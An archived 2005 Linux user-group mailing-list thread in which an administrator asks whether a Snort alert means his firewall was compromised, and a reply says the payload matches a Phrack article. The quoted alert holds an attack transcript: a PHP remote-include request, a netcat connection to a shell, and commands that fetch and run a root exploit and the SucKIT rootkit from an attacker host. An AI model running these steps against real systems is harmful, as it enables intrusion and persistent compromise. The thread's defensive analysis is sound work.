[wplug] Need help with a snort alert. Did my box get hacked?

Poyner, Brandon bpoyner at ccac.edu
Fri Oct 21 14:14:39 EDT 2005 

Looks like somebody was looking at a Phrack article, word for word matches your alert.  Probably nothing to worry about.
 
http://www.phrack.org/phrack/58/p58-0x07
 
PS: apologies for top-posting and html email, I'm using webmail today.

	-----Original Message----- 
	From: wplug-bounces+bpoyner=ccac.edu at wplug.org on behalf of Chris Romano 
	Sent: Fri 10/21/2005 9:12 AM 
	To: General user list 
	Cc: 
	Subject: [wplug] Need help with a snort alert. Did my box get hacked?
	
	
	I came in this moring and checked my snort alerts (morning routine), and noticed the following:
	
	ATTACK-RESPONSES id check returned root            2005-10-21 07:40:32            82.165.25.125:80             10.10.10.5:51949             TCP
	
	Some background.  10.10.10.x is my dmz and 10.10.10.5 is a firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our 192.168.0.x internal network.
	So I started digging around. The alert logged the following:
	
	SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit  *.* 
	(c)oded by sd at sf.cz & devik at cdi.cz, 2001 
	Configuring ./sk:.OK!.[attacker at badass.cz ~/sk10]$ telnet lamehost.com 80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host: lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52 GMT.Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET ag: &quot;31c6-c2-3bb3ffba&quot;.Content-Type: text/html..IT WERKS! Shell at port 8193 Connection closed by foreign host..[attacker at badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com [192.168.0.2] 8193 (?) open.w.12:08am up  1:20,  3 users,  load average: 0.05, 0.06,0.08.USER     TTY      FROM    LOGIN at IDLE   JCPU   PCPU  AT.root   tty1     -  11:58pm 39:03   3.15s  2.95s  bash.cd /tmp.lynx -dump http://badass.cz/s.c &gt <http://badass.cz/s.c&gt> ; s.c.gcc s.c o super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd .l33t.lynx -dump http://badass.cz/~attacker/sk10/s
	k &gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w
	
	Ok, there a few things that make me think that this is a false positive.  First is the "192.160.0.02" IP.  That is not on this network.  Second, There is no host on 192.168.0.2.  Third, I do not have any Red Hat machines.  They are all Slackware.  I am still concerned.  I searched for "sk" and all I found are two directories related to vim and I didn't find a directory called "l33t".
	
	Can anyone me verify that I wasn't hacked?
	
	Thanks,
	Chris
	

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/ms-tnef
Size: 7186 bytes
Desc: not available
Url : http://www.wplug.org/pipermail/wplug/attachments/20051021/a7b4b516/attachment.bin

More information about the wplug mailing list